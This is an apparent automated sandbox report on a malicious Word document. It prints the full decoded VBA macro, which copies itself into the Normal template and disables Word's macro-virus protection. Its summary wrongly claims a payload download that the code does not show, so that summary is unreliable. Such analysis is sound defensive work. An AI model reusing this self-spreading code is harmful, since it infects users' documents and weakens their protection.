MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing a VBA macro that is triggered by the Document_Open event. The macro appears to be designed to download and execute a secondary payload, as indicated by the ClamAV detection name 'Doc.Trojan.Confusion-2' and the presence of VBA code that manipulates the document and potentially interacts with external resources. The macro's code is heavily obfuscated and truncated, making a precise analysis of its actions difficult, but its intent is clearly malicious.
Heuristics 3
-
ClamAV: Doc.Trojan.Confusion-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Confusion-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2386 bytes |
SHA-256: 90d4e78c0b6ac5f2f937edec1672a34a772c87fd4202a5ccbb01ec6b740ef826 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() A1 = System.Country Set A = ThisDocument gh = Application.DisplayAlerts With A Set dfg = Word.System Set B = .VBProject If Application.Documents.Count = 0 Then gfs = Application.Caption End With Author = "Lys Kovick" With B Application.Visible = True Set C = .VBComponents If C1 = Application.Version Then Beep End With kgb = afterme With C CPU = System.ProcessorType Set D = .Item(1) R = U = Confused End With ICU = DoUCMe With D BSBSBS = Application.Caption Set E = .CodeModule OS = System.OperatingSystem End With TD = ThisDocument With E A1 = System.Country F = .Lines(1, .CountOfLines) gh = Application.DisplayAlerts End With Set dfg = Word.System If A = ActiveDocument Then If Application.Documents.Count = 0 Then gfs = Application.Caption Set G = NormalTemplate Author = "Lys Kovick" Else Application.Visible = True Set G = ActiveDocument If C1 = Application.Version Then Beep End If kgb = afterme With G CPU = System.ProcessorType Set H = .VBProject R = U = Confused End With ICU = DoUCMe With H BSBSBS = Application.Caption Set I = .VBComponents OS = System.OperatingSystem End With TD = ThisDocument With I A1 = System.Country Set J = .Item(1) gh = Application.DisplayAlerts End With Set dfg = Word.System With J If Application.Documents.Count = 0 Then gfs = Application.Caption Set K = .CodeModule Author = "Lys Kovick" End With Application.Visible = True With K If C1 = Application.Version Then Beep .DeleteLines 1, .CountOfLines kgb = afterme End With CPU = System.ProcessorType With K R = U = Confused .AddFromString F ICU = DoUCMe End With BSBSBS = Application.Caption Set L = Options OS = System.OperatingSystem With L TD = ThisDocument .ConfirmConversions = 0 A1 = System.Country End With gh = Application.DisplayAlerts With L Set dfg = Word.System .SaveNormalPrompt = 0 If Application.Documents.Count = 0 Then gfs = Application.Caption End With Author = "Lys Kovick" With L Application.Visible = True .VirusProtection = 0 If C1 = Application.Version Then Beep End With kgb = afterme End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.